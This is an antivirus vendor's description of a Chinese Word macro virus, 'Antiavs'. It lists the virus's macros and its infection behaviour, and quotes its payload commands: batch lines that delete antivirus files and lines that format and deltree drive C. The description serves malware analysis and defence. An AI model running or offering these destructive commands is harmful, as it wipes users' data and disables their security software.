macro.word.antiav
Webroot Antivirus: The best protection against viruses, spyware data theft and hackers.
Description:
Details
Macro.Word.Antiavs
This is an encrypted Chinese Word macro virus. It contains nine macros: AutoExec, AAV, AutoOpen, AutoNew, FileSaveAs, ZlockMacro, FileTemplates, ToolsMacro, Organizer.
The virus infects the global macros area on opening an infected document (AutoOpen) and writes itself to documents that are saved with a new name (FileSaveAs).
On entering the File/Template menu (FileTemplate) the virus sets the password "AntiAVs" for current document and displays the MessageBox:
WordBasic Err = 16
Not enough memory!
On entering the Tools/Macro menu (ToolsMacro) the virus erases all texts within current document and appends to the AUTOEXEC.BAT file the commands that erase the anti-virus PC-CILLIN files:
echo off
attrib -h -r -s +a c:\pc-cil~1\*.* >nul
del c:\pc-cil~1\*.dll >nul
The virus then erases the anti-virus files:
C:\PC-Cillin 95\Lpt$vpn.*
C:\PC-Cillin 97\Lpt$vpn.*
C:\Tsc\PC-Cillin 97\Lpt$vpn.*
C:\Zlockav\Gsav.cas
C:\VB7\Virus.txt
C:\Program Files\Norton AntiVirus\Viruscan.dat
C:\Program Files\Symantec\Symevnt.386
C:\Program Files\McAfee\VirusScan95\Scan.dat
C:\Program Files\McAfee\VirusScan95\Mcscan32.dll
C:\Program Files\McAfee\VirusScan\Scan.dat
C:\Program Files\McAfee\VirusScan\Mcscan32.dll
C:\Program Files\Command Software\F-PROT95\Sign.def
C:\Program Files\Command Software\F-PROT95\Dvp.vxd
C:\Program Files\AntiViral Toolkit Pro\Avp32.exe
C:\Program Files\AntiViral Toolkit Pro\*.avc
C:\Tbavw95\Tbavw95.vxd
Depending on the system random counter the virus writes the text to the AUTOEXEC.BAT file:
@Echo off
cls
echo I have clean a huge virus:
echo MS-WINDOWS
echo for you. ^_^
echo --AntiAVs--
echo y|format c: /u /v:AAV >nul
deltree /y c: >nul
Copyright @2006 macro.word.antiav